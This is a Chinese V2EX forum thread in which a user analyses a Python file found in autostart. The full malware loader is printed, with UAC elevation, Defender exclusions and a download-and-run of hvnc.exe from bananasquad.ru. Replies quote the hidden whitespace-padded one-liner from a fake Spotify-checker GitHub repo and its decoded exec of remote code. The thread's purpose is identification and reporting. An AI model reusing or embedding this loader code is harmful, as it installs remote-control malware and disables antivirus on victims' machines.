开机的时候自动用 vscode 打开了一段代码。ChatGPT 说是病毒?? - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
请不要在回答技术问题时复制粘贴 AI 生成的内容
Jimmyisme
V2EX    程序员

开机的时候自动用 vscode 打开了一段代码。ChatGPT 说是病毒??

  •  8
     
  •   Jimmyisme 2024-02-28 10:37:14 +08:00 8858 次点击
    这是一个创建于 637 天前的主题,其中的信息可能已经有所发展或是发生改变。

    代码传网盘了,有没有大佬能看看怎么办 https://www.alipan.com/s/ysPCcqoe5TT

    第一个文件名是 hvnc.py

    import os import subprocess script = """ import os def create_and_run_bat_script(): bat_script_cOntent= ''' @echo off set "filePath=%appdata%\Microsoft\emptyfile20947.txt" :: BatchGotAdmin :------------------------------------- REM --> Check for permissions IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" ) ELSE ( >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" ) REM --> If error flag set, we do not have admin. if '%errorlevel%' NEQ '0' ( echo Requesting administrative privileges... goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params= %* echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B :gotAdmin pushd "%CD%" CD /D "%~dp0" :-------------------------------------- mkdir "C:\Windows\WinEmptyfold" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'" set "temp_file=%TEMP%\hahabonk.exe" powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://bananasquad.ru/hvnc.exe', '%temp_file%')" start "" "%temp_file%" del /q "%appdata%\Microsoft\runpython.py" ''' temp_folder = os.environ.get('TEMP', '') if temp_folder: bat_script_path = os.path.join(temp_folder, 'temp_script.bat') with open(bat_script_path, 'w') as bat_file: bat_file.write(bat_script_content) os.system(bat_script_path) else: print("Failed to get the TEMP folder path.") if os.name == 'nt': folder_path = r"C:\Windows\WinEmptyfold" if os.path.exists(folder_path): exit() else: os.system('timeout 600') os.system('taskkill /f /im explorer.exe') create_and_run_bat_script() while True: os.system('timeout 5') if os.path.exists(folder_path): os.system('start explorer.exe') break else: create_and_run_bat_script() """ appdata = os.environ.get('APPDATA', '') if appdata: # create microsoft folder if it doesn't exist microsoft_folder = os.path.join(appdata, 'Microsoft') if not os.path.exists(microsoft_folder): os.mkdir(microsoft_folder) script_path = os.path.join(appdata, 'Microsoft', 'runpython.py') with open(script_path, 'w') as script_file: script_file.write(script) subprocess.Popen(['python', script_path], creatiOnflags=subprocess.CREATE_NO_WINDOW) 
    第 1 条附言    2024-02-28 16:09:32 +08:00
    喜大普奔,恶意 repo 已经 404 了
    62 条回复    2024-02-29 17:11:33 +08:00
    Jimmyisme
        1
    Jimmyisme  
    OP
       2024-02-28 10:42:03 +08:00
    目前发现是在自启动中,但是我设置了 py 文件用 vscode 。可能就没有运行。
    ![]( )
    Jimmyisme
        2
    Jimmyisme  
    OP
       2024-02-28 10:44:59 +08:00
    删除文件再 ctrl+z 撤回删除操作就被火绒拦截了。不是很懂为什么之前没有被发现。目前来看应该没什么大碍

    ![]( )
    WoneFrank
        3
    WoneFrank  
       2024-02-28 10:51:31 +08:00 nbsp; 1
    一看就病毒啊,有突破 UAC ,还去这拉了个 exe: https://bananasquad.ru/hvnc.exe
    可以看 virustotal: https://www.virustotal.com/gui/domain/bananasquad.ru/relations
    AoEiuV020JP
        4
    AoEiuV020JP  
       2024-02-28 10:53:10 +08:00   2
    有点搞笑了,投 python 病毒也不管电脑上有没有 python 环境,直接默认编辑器打开了,
    Jimmyisme
        5
    Jimmyisme  
    OP
       2024-02-28 10:55:55 +08:00
    Jimmyisme
        6
    Jimmyisme  
    OP
       2024-02-28 10:57:03 +08:00
    @WoneFrank 感谢,这方面的内容没有了解过,我看看有没有这个病毒的分析
    Jimmyisme
        7
    Jimmyisme  
    OP
       2024-02-28 10:58:28 +08:00
    @AoEiuV020JP 幸好我默认设置.py 是用 vscode 打开。我发现我默认的 python 环境确实装了他这个脚本要运行的 fernet 库。
    Jimmyisme
        8
    Jimmyisme  
    OP
       2024-02-28 11:00:35 +08:00
    @Jimmyisme #5
    这段代码劫持了剪贴板,然后这是我昨天遇到的问题。估计以及中招了
    ![]( )
    Jimmyisme
        9
    Jimmyisme  
    OP
      &nsp;2024-02-28 11:17:57 +08:00   21
    我知道是哪里来的了,真 nm 脑残啊
    https://github.com/maqrtineLzjulyie/spotify-check-premium/blob/main/main.py

    第一行的最后面。还有 nm 一段代码。艹了
    之前刷到在舍友的 for 循环后面偷偷加分号,乐子人终成乐子。妈的
    MidGap
        10
    MidGap  
       2024-02-28 11:24:08 +08:00
    @Jimmyisme #9 6666666666666666666666666
    dier
        11
    dier  
       2024-02-28 11:27:13 +08:00
    @Jimmyisme #9 这思路也是牛 B 。我点进去看了几眼都没看到问题,无意发现有水平滚动条,还那么长。。。
    cT4035xGkTUJ0Ce7
        12
    cT4035xGkTUJ0Ce7  
       2024-02-28 11:32:01 +08:00 via Android
    吓得我赶紧把自动折行打开
    chackchackGO
        13
    chackchackGO  
       2024-02-28 11:34:41 +08:00
    @Jimmyisme 为什么这个仓库有 4.5k 的 fork? 我没看明白
    morgan1freeman
        14
    morgan1freeman  
       2024-02-28 11:34:59 +08:00
    @Jimmyisme #9 开源 也不是完全安全,还是得审核代码,问题太多了
    HFX3389
        15
    HFX3389  
       2024-02-28 11:37:42 +08:00
    @Jimmyisme #8 说不定是比特币地址:D
    wkla
        16
    wkla  
       2024-02-28 11:37:44 +08:00
    @Jimmyisme #9 Github 上老多这种装成盗版的病毒了。
    nekomiao
        17
    nekomiao  
       2024-02-28 11:40:11 +08:00   1
    @chackchackGO fork 和 star 差这么多,明显是刷的
    inhzus
        18
    inhzus  
       2024-02-28 11:40:57 +08:00
    速速打开 toggle word wrap
    Link99
        19
    Link99  
       2024-02-28 11:41:01 +08:00
    牛逼 这干嘛用的啊 Fork 4.5k Star 6 ?
    Jimmyisme
        20
    Jimmyisme  
    OP
       2024-02-28 11:44:40 +08:00 via Android
    @chackchackGO #13 到处害人
    ghjh
        21
    ghjh  
       2024-02-28 11:47:18 +08:00 via Android
    @Jimmyisme 好家伙,我还寻思呢,咋手机 github 打开就一行 import os
    shinession
        22
    shinession  
       2024-02-28 11:55:41 +08:00
    学到了一招, 还能这么玩的
    flyqie
        23
    flyqie  
       2024-02-28 11:57:10 +08:00 via Android
    感谢分享,涨知识了,已向 github 举报
    xixixicat
        24
    xixixicat  
       2024-02-28 11:58:34 +08:00
    @Jimmyisme 不是,这思路也太牛逼了吧
    wangkun025
        25
    wangkun025  
       2024-02-28 12:00:43 +08:00
    已经举报给 GitHub 了。
    Les1ie
        26
    Les1ie  
       2024-02-28 12:00:45 +08:00
    恶意代码部分:
    ```
    import os ;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'yKpskffUwlXAGQtWJiXILDemLKDod4v8DpfKK3ClcHo=').decrypt(b'gAAAAABlv3l_ShNj4Sta_rsNaa9OI2cs0EyIBDdLPw6x4VVSxY9AYPGhGcOClTKrp_TBol_GE50_2GWBH3IfwUsOTJpM5PvjUgD939S4E75PGnNWs_qq9kk1mbhzcEuOumsWSm28OPbC6vs4CjgTliTihSbRedGIUvizU9JdEpFIQfkFU6sbmpBFR9kzI8ttiIoFqxLvEriZ6tvIumAuq_s-A65rXKflng=='))
    import requests
    import json
    ```
    利用超长的空格欺骗没有开启自动换行的编辑器,的确是未设想的添加后门的方式。这个方法究极简单却有用,稍有不慎我也可能中招了。
    CivAx
        27
    CivAx  
       2024-02-28 12:01:14 +08:00
    这个藏的有意思,已经向 github report-abuse 了。
    noahlias
        28
    noahlias  
       2024-02-28 12:39:34 +08:00
    看了一下 点开它的 fork 都是机器人
    都是 2 周前注册的 而且他们的 repo 都有这段代码哈哈 应该都是钓鱼的
    ohmyhaha
        29
    ohmyhaha  
       2024-02-28 13:48:36 +08:00
    hvnc....按理解这个是远控用的呢
    HashV2
        30
    HashV2  
       2024-02-28 13:50:13 +08:00
    @Jimmyisme #9 真的 6 啊 要是我估计也中招了
    Jimmyisme
        31
    Jimmyisme  
    OP
       2024-02-28 13:53:58 +08:00
    ohmyhaha
        32
    ohmyhaha  
       2024-02-28 13:59:57 +08:00
    @Jimmyisme 是的。在另外一个隐藏桌面。这样你直接用你的浏览器登录你已经登录的网站或者应用。有效绕过 OPT 和风控
    straydragon
        33
    straydragon  
       2024-02-28 14:04:45 +08:00
    已举报, 这个思路很简单也很容易中招, 吓得直接开启自动折行了
    Rickkkkkkk
        34
    Rickkkkkkk  
       2024-02-28 14:11:48 +08:00
    (这下知道代码规范里一行不能过长的道理了吧
    hikarugo
        35
    hikarugo  
       2024-02-28 14:25:01 +08:00
    公共场合投毒啊,这些孙子
    NEPv5NA6R8R3Y11u
        36
    NEPv5NA6R8R3Y11u  
       2024-02-28 14:29:31 +08:00
    加密部分代码:
    exec(requests.get('https://bananasquad.ru/paste').text.replace('<pre>','').replace('</pre>',''))

    从这个网站获取代码去除前后标签后执行
    NEPv5NA6R8R3Y11u
        37
    NEPv5NA6R8R3Y11u  
       2024-02-28 14:43:54 +08:00


    https://paste.org.cn/ODrRp80p0c

    网站内容,会再次获取一个非常长的代码

    https://github.com/azgaresncf/bananasquad
    NEPv5NA6R8R3Y11u
        38
    NEPv5NA6R8R3Y11u  
       2024-02-28 14:45:23 +08:00
    这个人应该是制作脚本的人,看描述是不像是恶性攻击,
    machenme
        39
    machenme  
       2024-02-28 15:02:36 +08:00
    大概意思是先检测系统。如果是 NT 就执行,然后关闭 UAC ,获取管理员权限,然后下载一个那个 hvnc.exe 刚点进去被火绒杀了。建议删了吧
    病毒名称:TrojanSpy/MSIL.Stealer.dr
    病毒 ID:D7EE101A6EEFC320
    SoyaDokio
        40
    SoyaDokio  
       2024-02-28 15:08:09 +08:00
    reported the repository.
    Jimmyisme
        41
    Jimmyisme  
    OP
       2024-02-28 15:52:59 +08:00
    @Oohuo #38 这个人应该也是中毒了,给了一个删除的教程。
    kaleido
        42
    kaleido  
       2024-02-28 15:54:42 +08:00
    楼上投诉好像生效了,fork 只有个位数了
    wpyfawkes
        43
    wpyfawkes  
       2024-02-28 16:03:33 +08:00
    话说上个月到官网下 sqlmap 里面有个文件也被卡巴斯基报毒了
    makerbi
        44
    makerbi  
       2024-02-28 16:10:40 +08:00
    我已经 report 了,Github 刚刚给我回复处理了
    qq316107934
        45
    qq316107934  
       2024-02-28 16:12:09 +08:00
    report 得到答复了,不仅 repo 没了,号都被扬了,好
    Jimmyisme
        46
    Jimmyisme  
    OP
       2024-02-28 16:15:33 +08:00
    这个病毒,我估计是我自己手贱,UAC 点了 yes 。这种情况下,杀毒软件是不是已经没有用了?还是说只是火绒太拉。已经准备考虑付费卡巴斯基了
    Levox
        47
    Levox  
       2024-02-28 16:19:15 +08:00
    重装吧 doge
    Jimmyisme
        48
    Jimmyisme  
    OP
       2024-02-28 16:25:09 +08:00
    @Levox 代码开源的,看得到操作了什么。删干净应该就可以了。
    silencil
        49
    silencil  
       2024-02-28 16:25:15 +08:00
    这是什么项目?
    Levox
        50
    Levox  
       2024-02-28 16:27:27 +08:00
    @Jimmyisme 不是说有 exe ?逆下 exe ?
    Jimmyisme
        51
    Jimmyisme  
    OP
       2024-02-28 16:31:57 +08:00
    @Levox #50 exe 是 hvnc ,也是一个开源项目
    emma3
    &bsp;   52
    emma3  
       2024-02-28 17:04:45 +08:00
    https://bananasquad.ru/hvnc.exe
    这个.exe 是什么东西?
    neetz
        53
    neetz  
       2024-02-28 18:25:39 +08:00
    来晚了项目 404 了,github 上这个项目是干啥的?
    thinkm
        54
    thinkm  
       2024-02-28 18:28:40 +08:00   4
    这个帖子我都打不开,关了杀软才能打开
    wangkun025
        55
    wangkun025  
       2024-02-28 20:50:16 +08:00
    @pujx233 检查是不是 spotify 的 premium 账号
    jeffson
        56
    jeffson  
       2024-02-28 23:59:18 +08:00 via Android
    666
    studyingss
        57
    studyingss  
       2024-02-29 11:28:39 +08:00
    @thinkm 什么杀软这么强?
    CivAx
        58
    CivAx  
       2024-02-29 11:28:46 +08:00
    @CivAx #27 收到 Github 邮件,已经 Take down 了。
    thinkm
        59
    thinkm  
       2024-02-29 11:32:52 +08:00
    @studyingss 卡巴斯基
    EeveeRibbon
        60
    EeveeRibbon  
       2024-02-29 14:36:32 +08:00 via Android
    卡巴斯基连网页都打不开,我用的远控没法关掉保护,只好拿手机看的帖子
    Jimmyisme
        61
    Jimmyisme  
    OP
       2024-02-29 16:33:22 +08:00
    @qiaofanxing 刚买了半年的卡巴斯基。感觉弄得电脑好卡,之前软件都是秒开,现在都要等 2 秒以上。
    vainl1
        62
    vainl1  
       2024-02-29 17:11:33 +08:00   1
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     906 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 38ms UTC 20:40 PVG 04:40 LAX 12:40 JFK 15:40
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86